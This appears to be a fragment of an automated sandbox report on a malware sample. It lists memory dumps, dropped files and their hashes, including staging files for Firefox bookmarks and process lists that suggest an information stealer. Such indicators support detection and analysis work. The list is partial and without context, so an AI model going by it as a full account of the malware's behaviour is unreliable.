SHA512 eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3

memory/1412-127-0x00000000000D0000-0x00000000000FA000-memory.dmp

memory/1872-132-0x0000000000E70000-0x0000000000EAE000-memory.dmp

memory/1872-133-0x0000000005E70000-0x0000000005ED6000-memory.dmp

C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\System\Process.txt

MD5 ce55a125bf7f33cd38b148013632b27a
SHA1 015fd2fe46b32ca28191d8a3bec3f711e94f093b
SHA256 9fa2c29b9e62e49fbb7a03b02155ccb99adac31ef8f93fa0807c9c55424a0046
SHA512 6ec76a7a646b703bf3051684de09b760edd06cda1c04f636aee54a3772ebc34b3f8d8591d61a86f94b8f655c2321092ba4e4a30f752e794ea4e150b84afd216f

memory/1872-291-0x00000000067E0000-0x0000000006872000-memory.dmp

memory/1872-292-0x0000000006E30000-0x00000000073D4000-memory.dmp

memory/1872-296-0x00000000069A0000-0x00000000069AA000-memory.dmp

C:\Users\Admin\AppData\Local\9a51fd45f5964912bf4f17da1ae8100f\msgid.dat

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2b8634a147a40bf4e6836be570a3e21d
SHA1 a1f2eb05ade58e4aa48b156e5de8d72dc04c4ad3
SHA256 2516904bf17e895f7b0c9bfec81fe1516de4d37c6a2835b8c83aa79f670f63ce
SHA512 78c5348a121bc00e6f7427dc4b11c301c4f2e898c4108eb328c8a740d96fc8a8a1f869b3769e84ec1b36fc483280ae7b6d5e9981e7bf2facd548944b036a0bd8